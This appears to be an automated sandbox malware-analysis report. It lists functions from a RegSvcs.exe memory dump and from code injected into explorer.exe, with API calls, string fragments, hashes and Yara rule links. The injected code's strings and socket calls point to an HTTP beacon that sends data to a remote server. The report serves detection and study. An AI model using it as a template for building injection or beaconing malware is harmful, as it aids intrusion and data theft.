Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3de3b6eb02a1f4249a8204d5a17d38c1aad350151383a531234e80e495444519
Instruction ID: 9844acb07abcb114650f86c2126410a6c57193ef501be4138abf81afb00d9bf1
Opcode Fuzzy Hash: 3de3b6eb02a1f4249a8204d5a17d38c1aad350151383a531234e80e495444519
Instruction Fuzzy Hash: 8EE1F276D00608DFCB25CFA9C984A9DBBF5FF88304F14496EEA46AB661D770A841CF10

Function 0164EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0164EFE1
RtlDebugPrintTimes.NTDLL ref: 0164F009
RtlDebugPrintTimes.NTDLL ref: 0164F0AC
RtlDebugPrintTimes.NTDLL ref: 0164F160

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 7b226eea6d27485af1b5524e09fdccdb3027223039cc022b01864f994c806e3f
Instruction ID: 6acb44675de8fef7d0c851b7a8de075ae02b123849fe9cea4cb52bd46e40a344
Opcode Fuzzy Hash: 7b226eea6d27485af1b5524e09fdccdb3027223039cc022b01864f994c806e3f
Instruction Fuzzy Hash: AD712571E002199FDF05DFA8CD84AEDBBF5BF48315F1440AAEA05EB254D734A905CBA4

Function 0164F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0164F26D
RtlDebugPrintTimes.NTDLL ref: 0164F292
RtlDebugPrintTimes.NTDLL ref: 0164F324
RtlDebugPrintTimes.NTDLL ref: 0164F378

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: dc66a84faf4ed82c5cbce9451c1c5467ba8f157408614fc18ede13f396853fa9
Instruction ID: 1b600c91a9e48ba1ef671b5a665ae97f1a1c90a0a4dae145826e74d290e0c5b0
Opcode Fuzzy Hash: dc66a84faf4ed82c5cbce9451c1c5467ba8f157408614fc18ede13f396853fa9
Instruction Fuzzy Hash: 09513276E00219DFDF09CF99D849ADDBBF1BF48355F0880AAE905AB250D734A901CF94

Function 01607B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01607B52
BaseThreadInitThunk.KERNEL32 ref: 01607B5C
RtlDebugPrintTimes.NTDLL ref: 016449ED
RtlDebugPrintTimes.NTDLL ref: 01644A70

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes$BaseInitThreadThunk
String ID:
API String ID: 4281723722-0
Opcode ID: 71eda87849aa2b78b28feaad3e38bca2635b16efe7092d5220e8657d1c2fc480
Instruction ID: 80dbd81a964ea888b3a45ad33d1417557443ae134ba94ade4fc3cf9e854b38ed
Opcode Fuzzy Hash: 71eda87849aa2b78b28feaad3e38bca2635b16efe7092d5220e8657d1c2fc480
Instruction Fuzzy Hash: 57312675E00219AFCF25DFA8EC45AADBBF1BB58710F204129E911B7394DB315900CF58

Function 015D59C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

@, xrefs: 01630AA7

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 9eeef80d8bcd5b587416000eee731d2dea5b065f41b80f446170ec992724c401
Instruction ID: d043a7b9dac123cd99318e50469b3922dafdf56c13664acef973ca91a317bc8d
Opcode Fuzzy Hash: 9eeef80d8bcd5b587416000eee731d2dea5b065f41b80f446170ec992724c401
Instruction Fuzzy Hash: 12324770D1026ADFDB35DF68C844BEDBBB0BB48304F0085E9D549AB241E7B49A85CF91

Function 01617D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01617E8B

Strings

-, xrefs: 01617DDD
+, xrefs: 01617DE8

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
Instruction ID: ace941460e368821aa6f428ddda428c04fbb94928c2701d23176c5c0dadd7102
Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
Instruction Fuzzy Hash: 75919F71E0020A9EEB24DF6DCC81ABFBBA5AF44320F6C851AE955E73C8D7309941CB51

Function 015ED02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 015ED3A4

Strings

l, xrefs: 015ED46B
Bl, xrefs: 015ED48C

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Bl$l
API String ID: 3446177414-208461968
Opcode ID: 5940da70db430a0a9267aa4e7cf492f5a58a518b82f70b130602aac9a15ddb95
Instruction ID: 37bbeda47c21573933fd1d16dce9043540797cca27642ac69f072058673fd2d1
Opcode Fuzzy Hash: 5940da70db430a0a9267aa4e7cf492f5a58a518b82f70b130602aac9a15ddb95
Instruction Fuzzy Hash: FAA18531E0035A8FEB39DB98CC98BADBBF6BB54304F0440D9D9096B241DB75AD85CB51

Function 01615DA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 01615E34

Strings

pow, xrefs: 01615E0C, 01615E29

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 5b474c9452be7f2bd9666f008e31649a3ca039c4d66118b98671bebcafc60b3f
Instruction ID: 515d253857295735a259106aa7b9ce8182e263913597dfd0943178ba6158d3ef
Opcode Fuzzy Hash: 5b474c9452be7f2bd9666f008e31649a3ca039c4d66118b98671bebcafc60b3f
Instruction Fuzzy Hash: 26517C71D182069AD712B71CCD0237EBBB4EB81711F1CC958E0E78639DEB348495DB4A

Function 015FD7B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 015FD959

Part of subcall function 015D4859: RtlDebugPrintTimes.NTDLL ref: 015D48F7

Strings

$, xrefs: 015FD900
$, xrefs: 015FD86D

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$
API String ID: 3446177414-233714265
Opcode ID: e8a8dc54fd374d27d139cb55ca8d9e03e24147602c39e2ac65460ea6694d3880
Instruction ID: b63ad9c4366d7079296c03ff67ae71f4b333b0555583361e5c853e9c6d895505
Opcode Fuzzy Hash: e8a8dc54fd374d27d139cb55ca8d9e03e24147602c39e2ac65460ea6694d3880
Instruction Fuzzy Hash: 2A51AC72E0034A9FDB24DFE8DD847ADBBB2BB84304F14515DDA056F285D771A891CB90

Function 0164FD82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0164FE73
RtlDebugPrintTimes.NTDLL ref: 0164FE95

Strings

$, xrefs: 0164FE3D

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $
API String ID: 3446177414-3993045852
Opcode ID: 30e47a14cbb78b081786367d18e452cfadf77f3c65565c6e348ff3fb3f9e9c22
Instruction ID: f8eec63bb34256a42607c01b148b9fd57388bc244032f09aafd2c4b47fc84664
Opcode Fuzzy Hash: 30e47a14cbb78b081786367d18e452cfadf77f3c65565c6e348ff3fb3f9e9c22
Instruction Fuzzy Hash: 51416B75A00209AFDB21DF9DDD84AEEBFB6FF48B04F144159E904A7342D771A911CBA0

Function 015CDF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 015CE040

Strings

0, xrefs: 015CE00B
0, xrefs: 015CE020

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: e94e775b402eee8adff09f4b9631dcb402cdd89e7e50e13fae5fb320e085a049
Instruction ID: ade971f40cc1cb11cda271089be0c68b3e0b39433b170901540876153c5bc704
Opcode Fuzzy Hash: e94e775b402eee8adff09f4b9631dcb402cdd89e7e50e13fae5fb320e085a049
Instruction Fuzzy Hash: 45417BB1A087069FC310CF68C984A1ABBE5FB89714F04492EF988DB341D771EA05CBD6

Analysis Process: explorer.exePID: 1028, Parent PID: 2820COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.3%
Total number of Nodes:	79
Total number of Limit Nodes:	9

Executed Functions

Function 118ADF82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 118AE12E
setsockopt.WS2_32 ref: 118AE830
recv.WS2_32 ref: 118AE859

Strings

&sql, xrefs: 118AE471
Co, xrefs: 118AE323
: cl, xrefs: 118AE338
nnec, xrefs: 118AE32A
&br=, xrefs: 118AE509
&un=, xrefs: 118AE4F1
GET , xrefs: 118AE318
ose, xrefs: 118AE33F
tion, xrefs: 118AE331
dat=, xrefs: 118AE290

Memory Dump Source

Source File: 0000000A.00000002.4544744783.0000000011860000.00000040.80000000.00040000.00000000.sdmp, Offset: 11860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_11860000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: d4451a632c5ff1d054546b44660f9d5fd06893a0f8303e9cb35cc903b66984cb
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: C352B034614A198FDB59EF68E4847EAB7E1FB54304F508A2ED4AFC7182EE30B545CB81

Function 118AD232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 118AD449

Strings

`, xrefs: 118AD41D

Memory Dump Source

Source File: 0000000A.00000002.4544744783.0000000011860000.00000040.80000000.00040000.00000000.sdmp, Offset: 11860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_11860000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: e9dbe8855bcc317711fb5c8e1c0c4de988678aaf463840fefc43d154178c8fc3
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: 09223670A18E0A9FDB49DF28D4997AEB7E1FB98305F40872AE45ED7250DB30E451CB81

Function 118AEE12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 118AEE67

Memory Dump Source

Source File: 0000000A.00000002.4544744783.0000000011860000.00000040.80000000.00040000.00000000.sdmp, Offset: 11860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_11860000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: f66faf0fe74d92c14a86e84ddbbebe07cf9cc7edded697ce3e9ec0187350277d
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: 9B01B534628B484F8784DF6CE48012AB7E4FBCD314F000B3EE59AC3251D770C5418742

Function 118AEE0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 118AEE67

Memory Dump Source

Source File: 0000000A.00000002.4544744783.0000000011860000.00000040.80000000.00040000.00000000.sdmp, Offset: 11860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_11860000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: 9c0856e2be6102c7b02b15a3fe7a48b0ecd064ba240fbc2ad388c974f911da6e
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: 1101A234628B884B8748EF2C94412A6B3E5FBCE314F004B3EE99AC3241DB21D5028782

Function 118A88C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 118A89A0

Strings

User-Agent: , xrefs: 118A8935, 118A8948
on.d, xrefs: 118A8902
nt: , xrefs: 118A891E
urlmon.dll, xrefs: 118A8959

Memory Dump Source

Source File: 0000000A.00000002.4544744783.0000000011860000.00000040.80000000.00040000.00000000.sdmp, Offset: 11860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_11860000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 676f536749473db96357549baa48091b6f14af630654a9f377dbbc70fbb7ba68
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 9031AD31614A0D8FCB04EFA8D8847EDB7E1FB58305F40422AD44AD7240DF789645C79A

Function 118A88BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 118A89A0

Strings

User-Agent: , xrefs: 118A8935, 118A8948
on.d, xrefs: 118A8902
nt: , xrefs: 118A891E
urlmon.dll, xrefs: 118A8959

Memory Dump Source

Source File: 0000000A.00000002.4544744783.0000000011860000.00000040.80000000.00040000.00000000.sdmp, Offset: 11860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_11860000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 08a52ac72730b15c79e4d935fe793411f9ab9d8eee2274ed5ca9be36f5e115ed
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 0A21BF70610A4D8FCB05EFACD8847EDBBA1FF58309F40822AE45AD7240DF789645C79A

Function 118A4B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexExW.KERNEL32 ref: 118A4CCA

Strings

el32, xrefs: 118A4BA0
kern, xrefs: 118A4B99
.dll, xrefs: 118A4BCD

Memory Dump Source

Source File: 0000000A.00000002.4544744783.0000000011860000.00000040.80000000.00040000.00000000.sdmp, Offset: 11860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_11860000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: 2e8414f376243850fd6c69cc5c8e7ced2174992317289d514ad0e18991da5656
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: FF416B74918A08CFDB94EFA8D8987AD77E0FF58304F04857AC84EDB255EE309946CB85

Function 118A4B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexExW.KERNEL32 ref: 118A4CCA

Strings

el32, xrefs: 118A4BA0
kern, xrefs: 118A4B99
.dll, xrefs: 118A4BCD

Memory Dump Source

Source File: 0000000A.00000002.4544744783.0000000011860000.00000040.80000000.00040000.00000000.sdmp, Offset: 11860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_11860000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: c396cb2bd29024eecd19318b99afbf7dc689b43518e1b8a9eba9d799c28ca2db
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: 11412B74918A088FDB94EFA8D4987AD77F1FF58304F04817AC84EDB255DE309945CB85

Function 118AA72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 118AA791

Strings

conn, xrefs: 118AA75A
ect, xrefs: 118AA761

Memory Dump Source

Source File: 0000000A.00000002.4544744783.0000000011860000.00000040.80000000.00040000.00000000.sdmp, Offset: 11860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_11860000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: 3f46180e8a9b4f8c699f6d1be245cf55daf6c2ad15c1f5ac22e38381f3f0cc09
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: 9A015E74618B188FCB84EF1CE088B55B7E0FB58314F1545AED90DCB226C674D881CBC2

Function 118AA732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 118AA791

Strings

conn, xrefs: 118AA75A
ect, xrefs: 118AA761

Memory Dump Source

Source File: 0000000A.00000002.4544744783.0000000011860000.00000040.80000000.00040000.00000000.sdmp, Offset: 11860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_11860000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: 9d1d7c880f922cd5bf90d9ee7e17ef6fcaa24c09ecf216d75252310778c573bd
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: C9012C70618A1C8FCB84EF5CE088B55BBE0FB59314F1541AEA80DCB226CA74C9818BC2

Function 118AA6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 118AA713

Strings

send, xrefs: 118AA6DA

Memory Dump Source

Source File: 0000000A.00000002.4544744783.0000000011860000.00000040.80000000.00040000.00000000.sdmp, Offset: 11860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_11860000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
